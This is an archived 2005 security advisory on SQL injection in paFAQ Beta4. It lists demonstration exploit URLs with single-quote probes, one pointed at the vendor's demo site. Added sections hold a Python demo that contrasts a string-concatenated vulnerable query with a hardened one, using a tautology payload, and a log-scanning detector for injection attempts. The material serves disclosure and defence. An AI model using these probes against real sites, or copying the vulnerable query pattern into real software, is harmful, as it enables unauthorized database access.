SecurityTracker.com
SecurityTracker Archives

Category:   Application (Generic)  >   paFAQ
Vendors:   PHP Arena
paFAQ Input Validation Holes Permit SQL Injection Attacks
SecurityTracker Alert ID:  1013232
SecurityTracker URL:  http://securitytracker.com/id/1013232
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 18 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): Beta4
Description:   Several input validation vulnerabilities were reported in paFAQ. A remote user can inject SQL commands.

Several scripts do not properly validate user-supplied input before using it in database queries. The 'question.php', 'answer.php', 'search.php', and 'comment.php' scripts are affected; the demonstration URLs reach them through 'index.php' via the 'act' parameter (Question, Answer, Search, Speak). The parameters probed in the demonstration URLs are 'id', 'cid', 'cat_id', 'limit', 'offset', 'orderby', 'order', and 'search_item'. The names 'orderby' and 'order' suggest values that end up as an ORDER BY column and sort direction, which cannot be protected by parameter binding alone and need an allow-list of permitted values; this is an inference from the parameter names, not something the report states. A remote user can submit a specially crafted URL to execute arbitrary SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://[target]/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://[target]/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://[target]/index.php?act=Question&id=1&orderby='&order=DESC&limit=10
http://[target]/index.php?act=Answer&cid=1&id=1&offset='
http://[target]/index.php?act=Search&code=01&search_item='
http://[target]/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://[target]/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4
http://[target]/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4
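The following is an added example, not code from paFAQ or PHP Arena. It models the act=Question listing driven by the URL parameters named above (id, orderby, order, limit, offset) against an in-memory SQLite table: first the way the advisory describes the flaw (every request value pasted into the SQL text), then a hardened version that allow-lists the identifier and keyword values, validates the numeric ones, and binds them as parameters. The table name, the 'cat_id' and 'question' columns, and the sample rows are constructed for the illustration; only 'q_id' comes from the page. The tautology URL at the end is a constructed follow-up to the advisory's single-quote probe, not one of the reported URLs.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the FAQ questions table; not paFAQ's real schema.
SCHEMA = """
CREATE TABLE questions (q_id INTEGER PRIMARY KEY, cat_id INTEGER, question TEXT);
INSERT INTO questions VALUES (1, 1, 'How do I install it?');
INSERT INTO questions VALUES (2, 1, 'How do I upgrade?');
INSERT INTO questions VALUES (3, 2, 'Where are the logs?');
"""

# Allow-lists for the two values that become SQL identifiers/keywords (assumed set).
ALLOWED_ORDERBY = {"q_id", "cat_id", "question"}
ALLOWED_ORDER = {"ASC", "DESC"}


class InvalidParameter(ValueError):
    """Raised by the hardened path when a request value fails validation."""


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def params_from_url(url):
    """First value of each query parameter, roughly what PHP's $_GET exposes."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def vulnerable_query(con, p):
    """The pattern the advisory describes: raw request values spliced into SQL."""
    sql = (f"SELECT q_id, question FROM questions WHERE cat_id = {p.get('id', '')} "
           f"ORDER BY {p.get('orderby', '')} {p.get('order', '')} "
           f"LIMIT {p.get('limit', '')} OFFSET {p.get('offset', '')}")
    return con.execute(sql).fetchall()


def to_int(value, name, lo, hi):
    """Accept only a short decimal string inside [lo, hi]; reject anything else."""
    if not re.fullmatch(r"[0-9]{1,6}", value):
        raise InvalidParameter(f"{name} must be a decimal integer")
    n = int(value)
    if not lo <= n <= hi:
        raise InvalidParameter(f"{name} out of range")
    return n


def hardened_query(con, p):
    """Allow-list identifiers and keywords, validate numbers, bind the values."""
    orderby = p.get("orderby", "q_id")
    if orderby not in ALLOWED_ORDERBY:
        raise InvalidParameter("orderby must be one of " + ", ".join(sorted(ALLOWED_ORDERBY)))
    order = p.get("order", "DESC").upper()
    if order not in ALLOWED_ORDER:
        raise InvalidParameter("order must be ASC or DESC")
    cat_id = to_int(p.get("id", ""), "id", 1, 999999)
    limit = to_int(p.get("limit", "10"), "limit", 1, 100)
    offset = to_int(p.get("offset", "0"), "offset", 0, 999999)
    # orderby/order were checked against fixed sets, so interpolating them is safe;
    # the numeric values travel as bound parameters, never as SQL text.
    sql = (f"SELECT q_id, question FROM questions WHERE cat_id = ? "
           f"ORDER BY {orderby} {order} LIMIT ? OFFSET ?")
    return con.execute(sql, (cat_id, limit, offset)).fetchall()


def run_vulnerable(url):
    try:
        return vulnerable_query(connect(), params_from_url(url))
    except sqlite3.OperationalError as e:
        return f"SQL error: {e}"


def run_hardened(url):
    try:
        return hardened_query(connect(), params_from_url(url))
    except InvalidParameter as e:
        return f"rejected: {e}"


BENIGN = "http://www.example.com/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset=0"
# The advisory's first demonstration URL: a lone quote breaks the statement.
PROBE = "http://www.example.com/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='"
# Constructed follow-up showing why the error matters: the WHERE clause is rewritten.
TAUTOLOGY = "http://www.example.com/index.php?act=Question&id=1%20OR%201=1&limit=10&orderby=q_id&order=DESC&offset=0"

if __name__ == "__main__":
    for label, url in [("benign", BENIGN), ("probe", PROBE), ("tautology", TAUTOLOGY)]:
        print(label, "vulnerable:", run_vulnerable(url))
        print(label, "hardened:  ", run_hardened(url))
```

The benign URL returns the same two rows on both paths. The quote probe produces a database error on the vulnerable path (the symptom the advisory's URLs are designed to elicit) and a clean rejection on the hardened one; the tautology returns every row from the vulnerable path, including the row from another category, and is rejected before reaching the database by the hardened one.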

Pi3cH of PersianHacker.NET Security Team reported this flaw.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/pafaq.php
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [PersianHacker.NET 200505-07] paFAQ Beta4 Sql Injection
[PersianHacker.NET 200505-07] paFAQ Beta4 Sql Injection
Date: 2005 February
Bug Number: 07

paFAQ is a feature rich FAQ/Knowledge base system allowing webmasters to keep an organized database of Frequently Asked Questions. paFAQ also makes a great Knowledge Database for problems and solutions related to your scripts and programs. It runs using PHP and MySQL for speedy processing times.
More info @:
http://www.phparena.net/pafaq.php


Discussion:
--------------------
SQL injection in 'question.php', 'answer.php', 'search.php', and 'comment.php' may allow a remote user to launch SQL injection attacks. SQL injection is a form of attack on a database-driven Web site in which the attacker executes unauthorized SQL commands by taking advantage of insecure code on a system connected to the Internet, bypassing the firewall.

This vulnerability is reported to exist in paFAQ Beta4; other versions might also be affected.

Exploit:
--------------------
http://www.example.com/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://www.example.com/index.php?act=Question&id=1&orderby='&order=DESC&limit=10
http://www.example.com/index.php?act=Answer&cid=1&id=1&offset='
http://www.example.com/index.php?act=Search&code=01&search_item='
http://www.example.com/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://www.example.com/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4
http://www.example.com/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4


Example:
--------------------
At the author's website:
http://demo.phparena.net/pafaq/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='

Solution:
--------------------
In the code, validate values with PHP patterns, then process them.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: our security team users.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net


Note
--------------------
The script's authors were not contacted about this bug.
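Added here as a detection aid and not part of the advisory above: a scan over web-server access-log lines that flags requests to paFAQ's index.php whose 'act' value is one of the affected handlers (Question, Answer, Search, Speak) and whose query parameters either carry a single quote (raw or percent-encoded, as in the demonstration URLs) or hold a non-numeric value in a parameter the demonstration URLs use numerically. The log lines are constructed in common log format; the set of numeric parameters is an assumption drawn from the URLs on this page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Handlers named in the advisory's demonstration URLs.
AFFECTED_ACTS = {"Question", "Answer", "Search", "Speak"}
# Parameters the demonstration URLs use with numeric values (assumed numeric).
NUMERIC_PARAMS = {"id", "cid", "cat_id", "limit", "offset"}

# Common log format: client, identity, user, [timestamp] "METHOD URL HTTP/x.y" ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[0-9.]+"'
)

# Constructed access-log lines; not from any real server.
LOG_LINES = [
    '203.0.113.5 - - [18/Feb/2005:10:01:02 +0000] "GET /pafaq/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset=0 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [18/Feb/2005:10:01:09 +0000] "GET /pafaq/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset=%27 HTTP/1.1" 200 812',
    '203.0.113.7 - - [18/Feb/2005:10:01:15 +0000] "GET /pafaq/index.php?act=Search&code=01&search_item=\' HTTP/1.1" 200 790',
    '198.51.100.4 - - [18/Feb/2005:10:01:40 +0000] "GET /pafaq/index.php?act=Answer&cid=1&id=1%20OR%201=1&offset=0 HTTP/1.1" 200 9001',
    '203.0.113.9 - - [18/Feb/2005:10:02:00 +0000] "GET /pafaq/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id=1 HTTP/1.1" 302 0',
    '203.0.113.9 - - [18/Feb/2005:10:02:30 +0000] "GET /pafaq/style.css HTTP/1.1" 200 2048',
]


def findings_for_line(line):
    """Return (ip, act, param, decoded value, reason) tuples for one log line."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m["url"])
    if not parts.path.endswith("/index.php"):
        return []
    # parse_qs percent-decodes, so %27 and a literal quote are treated alike.
    qs = parse_qs(parts.query, keep_blank_values=True)
    act = qs.get("act", [""])[0]
    if act not in AFFECTED_ACTS:
        return []
    out = []
    for name, values in qs.items():
        for value in values:
            if "'" in value:
                out.append((m["ip"], act, name, value, "quote in value"))
            elif name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                out.append((m["ip"], act, name, value, "non-numeric"))
    return out


def scan(lines):
    return [f for line in lines for f in findings_for_line(line)]


if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding)
```

Three of the six constructed lines are flagged: the two single-quote probes against act=Question and act=Search, and the non-numeric 'id' sent to act=Answer. Requests to other paths and benign requests to the affected handlers pass through silently, which keeps the check usable on busy logs.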

Copyright 2021, SecurityGlobal.net LLC